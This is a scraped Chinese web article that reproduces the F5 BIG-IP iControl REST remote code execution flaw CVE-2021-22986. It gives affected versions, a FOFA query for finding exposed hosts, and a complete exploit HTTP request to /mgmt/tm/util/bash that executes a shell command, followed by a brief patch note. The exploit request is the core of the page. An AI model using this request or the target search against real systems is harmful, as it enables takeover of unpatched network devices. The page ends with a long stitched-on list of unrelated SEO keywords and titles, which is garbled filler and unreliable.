怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。F5 BIG-IPF5 BIG-IP
千家信息网最后更新 2025年12月01日怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
F5 BIG-IP
F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。
漏洞简介
F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。
影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
漏洞复现
fofa搜索关键词:
body="F5 Networks, Inc"
打开首页如下:
构造请求数据包,执行任意命令:
POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.123:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json{"command":"run","utilCmdArgs":"-c id"}修复建议
F5官方已发布相关安全更新,广大用户需及时更新到最新版本。
下载链接:
https://support.f5.com/csp/article/K02566623
关于怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
代码
链路
内容
命令
更多
版本
帮助
控制
更新
管理
不错
最大
安全
下一代
关键
关键词
兴趣
可用性
地址
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
招远微信小程序软件开发外包公司
数据库查询为啥要用索引
遵义领信网络技术有限公司
天津大学网络安全
软件开发模型制作教程
网络安全书法大赛揭晓
数据库能帮助我们做什么
网络安全信息通报规范
人从高速服务器能出去吗
国家网络安全技术考试网
省市县数据库 mysql
中国南方航空网络安全宣传周获奖
平安银行软件开发薪资
软件开发工具广泛应用年代
网站服务器租金
软件开发中占多少成本
数据库不设置主键怎么办
网络安全知识技能宣传普及
杭州牛顿网络技术公司
数据库加主键
服务器 mvc
云服务器提供商申请注册
联想服务器光盘启动不成功
穿越火线游戏违规被踢出服务器
软件开发人员用什么显示器
中职计算机网络技术学什么内容
窄带软件开发
如何组织软件开发小组
主从数据库同步意义
米尺网络技术教程